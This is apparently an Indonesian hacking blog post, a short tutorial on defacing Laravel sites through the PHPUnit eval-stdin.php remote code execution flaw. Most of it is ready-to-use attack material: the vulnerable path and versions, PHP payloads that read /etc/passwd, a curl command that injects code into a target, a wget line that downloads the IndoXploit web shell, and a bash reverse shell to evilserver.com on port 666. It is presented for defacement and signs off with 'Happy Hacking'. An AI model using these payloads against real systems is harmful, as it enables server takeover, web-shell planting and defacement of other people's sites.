Laravel PHPUnit Remote Code Execution
Hallo jumpa lagi dengan saya Rev, disini saya akan kasih tutorial deface Laravel PHPUnit RCE. Sebenarnya bug ini sudah lama tapi baru kali ini aja bisa buat tutorialnya karena udah lama gk update masalah exploit. Celah ini sebenarnya terletak pada vendor third party yakni PHPUnit, bukan dari Laravelnya...
- Vuln: eval-stdin.php
- Full Path Exploit : http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
- Affected versions : Before 4.8.28 and 5.x before 5.6.3
<?php system('tail /etc/passwd'); ?>
<?php echo php_uname(); ?>
<?php show_source('/etc/passwd'); ?>
Contoh Command
curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Jika ingin spawn shell bisa ubah ke wudget/diubah ke perintah backconnect
wget
<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>
Backconnect
<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?>
Lalu di evil server dilisten ke port 666
Sekian tutorial kali ini
Terima Kasih untuk :
exploit.linuxsec.org
Happy Hacking :)
#Laravel PHPUnit Remote Code Execution
#RCE
#PHPUnit
#Deface